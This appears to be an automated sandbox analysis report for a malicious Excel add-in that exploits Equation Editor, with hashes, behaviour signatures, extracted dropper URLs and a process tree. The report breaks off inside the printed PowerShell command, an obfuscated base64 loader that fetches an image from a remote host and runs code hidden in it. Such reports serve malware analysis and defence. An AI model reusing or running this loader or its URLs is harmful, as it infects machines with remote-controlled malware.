Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

240db31fca...1.xlam

windows7-x64

10

240db31fca...1.xlam

windows10-2004-x64

1

Analysis

  • max time kernel
    117s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    12/08/2024, 01:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    240db31fca0f94f85b17fe7d3ab4096acc1f7d7902e0d8ef8bec91cb4600eb81.xlam

  • Size

    617KB

  • MD5

    ad305741c0274f5e03b82e3064f734ca

  • SHA1

    503def7a04cff86b7e2aedc69cdfe8c02b7e3a6f

  • SHA256

    240db31fca0f94f85b17fe7d3ab4096acc1f7d7902e0d8ef8bec91cb4600eb81

  • SHA512

    46ce5ead793596693f2d73653a216fc9384bcf03933ffafb1ca850ced34e02776ab77adae88d618fca1099e743ffa3817165904a7cc32f2cc3888324d0644549

  • SSDEEP

    12288:82NJM8dx21qVNeT9XV1PQy1MWSAtyPfOSwUnbHJZLT+4fxaJDD7fLNXqxE38c/bP:DH720TwlSy17SRHSUbpZfvf2t3/bBYve

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Drops file in System32 directory 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

    exploit
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\240db31fca0f94f85b17fe7d3ab4096acc1f7d7902e0d8ef8bec91cb4600eb81.xlam
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1628
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:2672
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\fridayequitosdatinglover.vbs"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2568
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⚇ ⓕ ➝ ⯋ ⾍Bp⚇ ⓕ ➝ ⯋ ⾍G0⚇ ⓕ ➝ ⯋ ⾍YQBn⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍VQBy⚇ ⓕ ➝ ⯋ ⾍Gw⚇ ⓕ ➝ ⯋ ⾍I⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍9⚇ ⓕ ➝ ⯋ ⾍C⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍JwBo⚇ ⓕ ➝ ⯋ ⾍HQ⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍Bw⚇ ⓕ ➝ ⯋ ⾍HM⚇ ⓕ ➝ ⯋ ⾍Og⚇ ⓕ ➝ ⯋ ⾍v⚇ ⓕ ➝ ⯋ ⾍C8⚇ ⓕ ➝ ⯋ ⾍aQBh⚇ ⓕ ➝ ⯋ ⾍Dg⚇ ⓕ ➝ ⯋ ⾍M⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍z⚇ ⓕ ➝ ⯋ ⾍DE⚇ ⓕ ➝ ⯋ ⾍M⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍0⚇ ⓕ ➝ ⯋ ⾍C4⚇ ⓕ ➝ ⯋ ⾍dQBz⚇ ⓕ ➝ ⯋ ⾍C4⚇ ⓕ ➝ ⯋ ⾍YQBy⚇ ⓕ ➝ ⯋ ⾍GM⚇ ⓕ ➝ ⯋ ⾍a⚇ ⓕ ➝ ⯋ ⾍Bp⚇ ⓕ ➝ ⯋ ⾍HY⚇ ⓕ ➝ ⯋ ⾍ZQ⚇ ⓕ ➝ ⯋ ⾍u⚇ ⓕ ➝ ⯋ ⾍G8⚇ ⓕ ➝ ⯋ ⾍cgBn⚇ ⓕ ➝ ⯋ ⾍C8⚇ ⓕ ➝ ⯋ ⾍Mg⚇ ⓕ ➝ ⯋ ⾍3⚇ ⓕ ➝ ⯋ ⾍C8⚇ ⓕ ➝ ⯋ ⾍aQB0⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍bQBz⚇ ⓕ ➝ ⯋ ⾍C8⚇ ⓕ ➝ ⯋ ⾍dgBi⚇ ⓕ ➝ ⯋ ⾍HM⚇ ⓕ ➝ ⯋ ⾍Xw⚇ ⓕ ➝ ⯋ ⾍y⚇ ⓕ ➝ ⯋ ⾍D⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍Mg⚇ ⓕ ➝ ⯋ ⾍0⚇ ⓕ ➝ ⯋ ⾍D⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍Nw⚇ ⓕ ➝ ⯋ ⾍y⚇ ⓕ ➝ ⯋ ⾍DY⚇ ⓕ ➝ ⯋ ⾍Xw⚇ ⓕ ➝ ⯋ ⾍y⚇ ⓕ ➝ ⯋ ⾍D⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍Mg⚇ ⓕ ➝ ⯋ ⾍0⚇ ⓕ ➝ ⯋ ⾍D⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍Nw⚇ ⓕ ➝ ⯋ ⾍y⚇ ⓕ ➝ ⯋ ⾍DY⚇ ⓕ ➝ ⯋ ⾍LwB2⚇ ⓕ ➝ ⯋ ⾍GI⚇ ⓕ ➝ ⯋ ⾍cw⚇ ⓕ ➝ ⯋ ⾍u⚇ ⓕ ➝ ⯋ ⾍Go⚇ ⓕ ➝ ⯋ ⾍c⚇ ⓕ ➝ ⯋ ⾍Bn⚇ ⓕ ➝ ⯋ ⾍Cc⚇ ⓕ ➝ ⯋ ⾍Ow⚇ ⓕ ➝ ⯋ ⾍k⚇ ⓕ ➝ ⯋ ⾍Hc⚇ ⓕ ➝ ⯋ ⾍ZQBi⚇ ⓕ ➝ ⯋ ⾍EM⚇ ⓕ ➝ ⯋ ⾍b⚇ ⓕ ➝ ⯋ ⾍Bp⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍bgB0⚇ ⓕ ➝ ⯋ ⾍C⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍PQ⚇ ⓕ ➝ ⯋ ⾍g⚇ ⓕ ➝ ⯋ ⾍E4⚇ ⓕ ➝ ⯋ ⾍ZQB3⚇ ⓕ ➝ ⯋ ⾍C0⚇ ⓕ ➝ ⯋ ⾍TwBi⚇ ⓕ ➝ ⯋ ⾍Go⚇ ⓕ ➝ ⯋ ⾍ZQBj⚇ ⓕ ➝ ⯋ ⾍HQ⚇ ⓕ ➝ ⯋ ⾍I⚇ ⓕ ➝ ⯋ ⾍BT⚇ ⓕ ➝ ⯋ ⾍Hk⚇ ⓕ ➝ ⯋ ⾍cwB0⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍bQ⚇ ⓕ ➝ ⯋ ⾍u⚇ ⓕ ➝ ⯋ ⾍E4⚇ ⓕ ➝ ⯋ ⾍ZQB0⚇ ⓕ ➝ ⯋ ⾍C4⚇ ⓕ ➝ ⯋ ⾍VwBl⚇ ⓕ ➝ ⯋ ⾍GI⚇ ⓕ ➝ ⯋ ⾍QwBs⚇ ⓕ ➝ ⯋ ⾍Gk⚇ ⓕ ➝ ⯋ ⾍ZQBu⚇ ⓕ ➝ ⯋ ⾍HQ⚇ ⓕ ➝ ⯋ ⾍Ow⚇ ⓕ ➝ ⯋ ⾍k⚇ ⓕ ➝ ⯋ ⾍Gk⚇ ⓕ ➝ ⯋ ⾍bQBh⚇ ⓕ ➝ ⯋ ⾍Gc⚇ ⓕ ➝ ⯋ ⾍ZQBC⚇ ⓕ ➝ ⯋ ⾍Hk⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍Bl⚇ ⓕ ➝ ⯋ ⾍HM⚇ ⓕ ➝ ⯋ ⾍I⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍9⚇ ⓕ ➝ ⯋ ⾍C⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍J⚇ ⓕ ➝ ⯋ ⾍B3⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍YgBD⚇ ⓕ ➝ ⯋ ⾍Gw⚇ ⓕ ➝ ⯋ ⾍aQBl⚇ ⓕ ➝ ⯋ ⾍G4⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍u⚇ ⓕ ➝ ⯋ ⾍EQ⚇ ⓕ ➝ ⯋ ⾍bwB3⚇ ⓕ ➝ ⯋ ⾍G4⚇ ⓕ ➝ ⯋ ⾍b⚇ ⓕ ➝ ⯋ ⾍Bv⚇ ⓕ ➝ ⯋ ⾍GE⚇ ⓕ ➝ ⯋ ⾍Z⚇ ⓕ ➝ ⯋ ⾍BE⚇ ⓕ ➝ ⯋ ⾍GE⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍Bh⚇ ⓕ ➝ ⯋ ⾍Cg⚇ ⓕ ➝ ⯋ ⾍J⚇ ⓕ ➝ ⯋ ⾍Bp⚇ ⓕ ➝ ⯋ ⾍G0⚇ ⓕ ➝ ⯋ ⾍YQBn⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍VQBy⚇ ⓕ ➝ ⯋ ⾍Gw⚇ ⓕ ➝ ⯋ ⾍KQ⚇ ⓕ ➝ ⯋ ⾍7⚇ ⓕ ➝ ⯋ ⾍CQ⚇ ⓕ ➝ ⯋ ⾍aQBt⚇ ⓕ ➝ ⯋ ⾍GE⚇ ⓕ ➝ ⯋ ⾍ZwBl⚇ ⓕ ➝ ⯋ ⾍FQ⚇ ⓕ ➝ ⯋ ⾍ZQB4⚇ ⓕ ➝ ⯋ ⾍HQ⚇ ⓕ ➝ ⯋ ⾍I⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍9⚇ ⓕ ➝ ⯋ ⾍C⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍WwBT⚇ ⓕ ➝ ⯋ ⾍Hk⚇ ⓕ ➝ ⯋ ⾍cwB0⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍bQ⚇ ⓕ ➝ ⯋ ⾍u⚇ ⓕ ➝ ⯋ ⾍FQ⚇ ⓕ ➝ ⯋ ⾍ZQB4⚇ ⓕ ➝ ⯋ ⾍HQ⚇ ⓕ ➝ ⯋ ⾍LgBF⚇ ⓕ ➝ ⯋ ⾍G4⚇ ⓕ ➝ ⯋ ⾍YwBv⚇ ⓕ ➝ ⯋ ⾍GQ⚇ ⓕ ➝ ⯋ ⾍aQBu⚇ ⓕ ➝ ⯋ ⾍Gc⚇ ⓕ ➝ ⯋ ⾍XQ⚇ ⓕ ➝ ⯋ ⾍6⚇ ⓕ ➝ ⯋ ⾍Do⚇ ⓕ ➝ ⯋ ⾍VQBU⚇ ⓕ ➝ ⯋ ⾍EY⚇ ⓕ ➝ ⯋ ⾍O⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍u⚇ ⓕ ➝ ⯋ ⾍Ec⚇ ⓕ ➝ ⯋ ⾍ZQB0⚇ ⓕ ➝ ⯋ ⾍FM⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍By⚇ ⓕ ➝ ⯋ ⾍Gk⚇ ⓕ ➝ ⯋ ⾍bgBn⚇ ⓕ ➝ ⯋ ⾍Cg⚇ ⓕ ➝ ⯋ ⾍J⚇ ⓕ ➝ ⯋ ⾍Bp⚇ ⓕ ➝ ⯋ ⾍G0⚇ ⓕ ➝ ⯋ ⾍YQBn⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍QgB5⚇ ⓕ ➝ ⯋ ⾍HQ⚇ ⓕ ➝ ⯋ ⾍ZQBz⚇ ⓕ ➝ ⯋ ⾍Ck⚇ ⓕ ➝ ⯋ ⾍Ow⚇ ⓕ ➝ ⯋ ⾍k⚇ ⓕ ➝ ⯋ ⾍HM⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍Bh⚇ ⓕ ➝ ⯋ ⾍HI⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍BG⚇ ⓕ ➝ ⯋ ⾍Gw⚇ ⓕ ➝ ⯋ ⾍YQBn⚇ ⓕ ➝ ⯋ ⾍C⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍PQ⚇ ⓕ ➝ ⯋ ⾍g⚇ ⓕ ➝ ⯋ ⾍Cc⚇ ⓕ ➝ ⯋ ⾍P⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍8⚇ ⓕ ➝ ⯋ ⾍EI⚇ ⓕ ➝ ⯋ ⾍QQBT⚇ ⓕ ➝ ⯋ ⾍EU⚇ ⓕ ➝ ⯋ ⾍Ng⚇ ⓕ ➝ ⯋ ⾍0⚇ ⓕ ➝ ⯋ ⾍F8⚇ ⓕ ➝ ⯋ ⾍UwBU⚇ ⓕ ➝ ⯋ ⾍EE⚇ ⓕ ➝ ⯋ ⾍UgBU⚇ ⓕ ➝ ⯋ ⾍D4⚇ ⓕ ➝ ⯋ ⾍Pg⚇ ⓕ ➝ ⯋ ⾍n⚇ ⓕ ➝ ⯋ ⾍Ds⚇ ⓕ ➝ ⯋ ⾍J⚇ ⓕ ➝ ⯋ ⾍Bl⚇ ⓕ ➝ ⯋ ⾍G4⚇ ⓕ ➝ ⯋ ⾍Z⚇ ⓕ ➝ ⯋ ⾍BG⚇ ⓕ ➝ ⯋ ⾍Gw⚇ ⓕ ➝ ⯋ ⾍YQBn⚇ ⓕ ➝ ⯋ ⾍C⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍PQ⚇ ⓕ ➝ ⯋ ⾍g⚇ ⓕ ➝ ⯋ ⾍Cc⚇ ⓕ ➝ ⯋ ⾍P⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍8⚇ ⓕ ➝ ⯋ ⾍EI⚇ ⓕ ➝ ⯋ ⾍QQBT⚇ ⓕ ➝ ⯋ ⾍EU⚇ ⓕ ➝ ⯋ ⾍Ng⚇ ⓕ ➝ ⯋ ⾍0⚇ ⓕ ➝ ⯋ ⾍F8⚇ ⓕ ➝ ⯋ ⾍RQBO⚇ ⓕ ➝ ⯋ ⾍EQ⚇ ⓕ ➝ ⯋ ⾍Pg⚇ ⓕ ➝ ⯋ ⾍+⚇ ⓕ ➝ ⯋ ⾍Cc⚇ ⓕ ➝ ⯋ ⾍Ow⚇ ⓕ ➝ ⯋ ⾍k⚇ ⓕ ➝ ⯋ ⾍HM⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍Bh⚇ ⓕ ➝ ⯋ ⾍HI⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍BJ⚇ ⓕ ➝ ⯋ ⾍G4⚇ ⓕ ➝ ⯋ ⾍Z⚇ ⓕ ➝ ⯋ ⾍Bl⚇ ⓕ ➝ ⯋ ⾍Hg⚇ ⓕ ➝ ⯋ ⾍I⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍9⚇ ⓕ ➝ ⯋ ⾍C⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍J⚇ ⓕ ➝ ⯋ ⾍Bp⚇ ⓕ ➝ ⯋ ⾍G0⚇ ⓕ ➝ ⯋ ⾍YQBn⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍V⚇ ⓕ ➝ ⯋ ⾍Bl⚇ ⓕ ➝ ⯋ ⾍Hg⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍u⚇ ⓕ ➝ ⯋ ⾍Ek⚇ ⓕ ➝ ⯋ ⾍bgBk⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍e⚇ ⓕ ➝ ⯋ ⾍BP⚇ ⓕ ➝ ⯋ ⾍GY⚇ ⓕ ➝ ⯋ ⾍K⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍k⚇ ⓕ ➝ ⯋ ⾍HM⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍Bh⚇ ⓕ ➝ ⯋ ⾍HI⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍BG⚇ ⓕ ➝ ⯋ ⾍Gw⚇ ⓕ ➝ ⯋ ⾍YQBn⚇ ⓕ ➝ ⯋ ⾍Ck⚇ ⓕ ➝ ⯋ ⾍Ow⚇ ⓕ ➝ ⯋ ⾍k⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍bgBk⚇ ⓕ ➝ ⯋ ⾍Ek⚇ ⓕ ➝ ⯋ ⾍bgBk⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍e⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍g⚇ ⓕ ➝ ⯋ ⾍D0⚇ ⓕ ➝ ⯋ ⾍I⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍k⚇ ⓕ ➝ ⯋ ⾍Gk⚇ ⓕ ➝ ⯋ ⾍bQBh⚇ ⓕ ➝ ⯋ ⾍Gc⚇ ⓕ ➝ ⯋ ⾍ZQBU⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍e⚇ ⓕ ➝ ⯋ ⾍B0⚇ ⓕ ➝ ⯋ ⾍C4⚇ ⓕ ➝ ⯋ ⾍SQBu⚇ ⓕ ➝ ⯋ ⾍GQ⚇ ⓕ ➝ ⯋ ⾍ZQB4⚇ ⓕ ➝ ⯋ ⾍E8⚇ ⓕ ➝ ⯋ ⾍Zg⚇ ⓕ ➝ ⯋ ⾍o⚇ ⓕ ➝ ⯋ ⾍CQ⚇ ⓕ ➝ ⯋ ⾍ZQBu⚇ ⓕ ➝ ⯋ ⾍GQ⚇ ⓕ ➝ ⯋ ⾍RgBs⚇ ⓕ ➝ ⯋ ⾍GE⚇ ⓕ ➝ ⯋ ⾍Zw⚇ ⓕ ➝ ⯋ ⾍p⚇ ⓕ ➝ ⯋ ⾍Ds⚇ ⓕ ➝ ⯋ ⾍J⚇ ⓕ ➝ ⯋ ⾍Bz⚇ ⓕ ➝ ⯋ ⾍HQ⚇ ⓕ ➝ ⯋ ⾍YQBy⚇ ⓕ ➝ ⯋ ⾍HQ⚇ ⓕ ➝ ⯋ ⾍SQBu⚇ ⓕ ➝ ⯋ ⾍GQ⚇ ⓕ ➝ ⯋ ⾍ZQB4⚇ ⓕ ➝ ⯋ ⾍C⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍LQBn⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍I⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍w⚇ ⓕ ➝ ⯋ ⾍C⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍LQBh⚇ ⓕ ➝ ⯋ ⾍G4⚇ ⓕ ➝ ⯋ ⾍Z⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍g⚇ ⓕ ➝ ⯋ ⾍CQ⚇ ⓕ ➝ ⯋ ⾍ZQBu⚇ ⓕ ➝ ⯋ ⾍GQ⚇ ⓕ ➝ ⯋ ⾍SQBu⚇ ⓕ ➝ ⯋ ⾍GQ⚇ ⓕ ➝ ⯋ ⾍ZQB4⚇ ⓕ ➝ ⯋ ⾍C⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍LQBn⚇ ⓕ ➝ ⯋ ⾍HQ⚇ ⓕ ➝ ⯋ ⾍I⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍k⚇ ⓕ ➝ ⯋ ⾍HM⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍Bh⚇ ⓕ ➝ ⯋ ⾍HI⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍BJ⚇ ⓕ ➝ ⯋ ⾍G4⚇ ⓕ ➝ ⯋ ⾍Z⚇ ⓕ ➝ ⯋ ⾍Bl⚇ ⓕ ➝ ⯋ ⾍Hg⚇ ⓕ ➝ ⯋ ⾍Ow⚇ ⓕ ➝ ⯋ ⾍k⚇ ⓕ ➝ ⯋ ⾍HM⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍Bh⚇ ⓕ ➝ ⯋ ⾍HI⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍BJ⚇ ⓕ ➝ ⯋ ⾍G4⚇ ⓕ ➝ ⯋ ⾍Z⚇ ⓕ ➝ ⯋ ⾍Bl⚇ ⓕ ➝ ⯋ ⾍Hg⚇ ⓕ ➝ ⯋ ⾍I⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍r⚇ ⓕ ➝ ⯋ ⾍D0⚇ ⓕ ➝ ⯋ ⾍I⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍k⚇ ⓕ ➝ ⯋ ⾍HM⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍Bh⚇ ⓕ ➝ ⯋ ⾍HI⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍BG⚇ ⓕ ➝ ⯋ ⾍Gw⚇ ⓕ ➝ ⯋ ⾍YQBn⚇ ⓕ ➝ ⯋ ⾍C4⚇ ⓕ ➝ ⯋ ⾍T⚇ ⓕ ➝ ⯋ ⾍Bl⚇ ⓕ ➝ ⯋ ⾍G4⚇ ⓕ ➝ ⯋ ⾍ZwB0⚇ ⓕ ➝ ⯋ ⾍Gg⚇ ⓕ ➝ ⯋ ⾍Ow⚇ ⓕ ➝ ⯋ ⾍k⚇ ⓕ ➝ ⯋ ⾍GI⚇ ⓕ ➝ ⯋ ⾍YQBz⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍Ng⚇ ⓕ ➝ ⯋ ⾍0⚇ ⓕ ➝ ⯋ ⾍Ew⚇ ⓕ ➝ ⯋ ⾍ZQBu⚇ ⓕ ➝ ⯋ ⾍Gc⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍Bo⚇ ⓕ ➝ ⯋ ⾍C⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍PQ⚇ ⓕ ➝ ⯋ ⾍g⚇ ⓕ ➝ ⯋ ⾍CQ⚇ ⓕ ➝ ⯋ ⾍ZQBu⚇ ⓕ ➝ ⯋ ⾍GQ⚇ ⓕ ➝ ⯋ ⾍SQBu⚇ ⓕ ➝ ⯋ ⾍GQ⚇ ⓕ ➝ ⯋ ⾍ZQB4⚇ ⓕ ➝ ⯋ ⾍C⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍LQ⚇ ⓕ ➝ ⯋ ⾍g⚇ ⓕ ➝ ⯋ ⾍CQ⚇ ⓕ ➝ ⯋ ⾍cwB0⚇ ⓕ ➝ ⯋ ⾍GE⚇ ⓕ ➝ ⯋ ⾍cgB0⚇ ⓕ ➝ ⯋ ⾍Ek⚇ ⓕ ➝ ⯋ ⾍bgBk⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍e⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍7⚇ ⓕ ➝ ⯋ ⾍CQ⚇ ⓕ ➝ ⯋ ⾍YgBh⚇ ⓕ ➝ ⯋ ⾍HM⚇ ⓕ ➝ ⯋ ⾍ZQ⚇ ⓕ ➝ ⯋ ⾍2⚇ ⓕ ➝ ⯋ ⾍DQ⚇ ⓕ ➝ ⯋ ⾍QwBv⚇ ⓕ ➝ ⯋ ⾍G0⚇ ⓕ ➝ ⯋ ⾍bQBh⚇ ⓕ ➝ ⯋ ⾍G4⚇ ⓕ ➝ ⯋ ⾍Z⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍g⚇ ⓕ ➝ ⯋ ⾍D0⚇ ⓕ ➝ ⯋ ⾍I⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍k⚇ ⓕ ➝ ⯋ ⾍Gk⚇ ⓕ ➝ ⯋ ⾍bQBh⚇ ⓕ ➝ ⯋ ⾍Gc⚇ ⓕ ➝ ⯋ ⾍ZQBU⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍e⚇ ⓕ ➝ ⯋ ⾍B0⚇ ⓕ ➝ ⯋ ⾍C4⚇ ⓕ ➝ ⯋ ⾍UwB1⚇ ⓕ ➝ ⯋ ⾍GI⚇ ⓕ ➝ ⯋ ⾍cwB0⚇ ⓕ ➝ ⯋ ⾍HI⚇ ⓕ ➝ ⯋ ⾍aQBu⚇ ⓕ ➝ ⯋ ⾍Gc⚇ ⓕ ➝ ⯋ ⾍K⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍k⚇ ⓕ ➝ ⯋ ⾍HM⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍Bh⚇ ⓕ ➝ ⯋ ⾍HI⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍BJ⚇ ⓕ ➝ ⯋ ⾍G4⚇ ⓕ ➝ ⯋ ⾍Z⚇ ⓕ ➝ ⯋ ⾍Bl⚇ ⓕ ➝ ⯋ ⾍Hg⚇ ⓕ ➝ ⯋ ⾍L⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍g⚇ ⓕ ➝ ⯋ ⾍CQ⚇ ⓕ ➝ ⯋ ⾍YgBh⚇ ⓕ ➝ ⯋ ⾍HM⚇ ⓕ ➝ ⯋ ⾍ZQ⚇ ⓕ ➝ ⯋ ⾍2⚇ ⓕ ➝ ⯋ ⾍DQ⚇ ⓕ ➝ ⯋ ⾍T⚇ ⓕ ➝ ⯋ ⾍Bl⚇ ⓕ ➝ ⯋ ⾍G4⚇ ⓕ ➝ ⯋ ⾍ZwB0⚇ ⓕ ➝ ⯋ ⾍Gg⚇ ⓕ ➝ ⯋ ⾍KQ⚇ ⓕ ➝ ⯋ ⾍7⚇ ⓕ ➝ ⯋ ⾍CQ⚇ ⓕ ➝ ⯋ ⾍YwBv⚇ ⓕ ➝ ⯋ ⾍G0⚇ ⓕ ➝ ⯋ ⾍bQBh⚇ ⓕ ➝ ⯋ ⾍G4⚇ ⓕ ➝ ⯋ ⾍Z⚇ ⓕ ➝ ⯋ ⾍BC⚇ ⓕ ➝ ⯋ ⾍Hk⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍Bl⚇ ⓕ ➝ ⯋ ⾍HM⚇ ⓕ ➝ ⯋ ⾍I⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍9⚇ ⓕ ➝ ⯋ ⾍C⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍WwBT⚇ ⓕ ➝ ⯋ 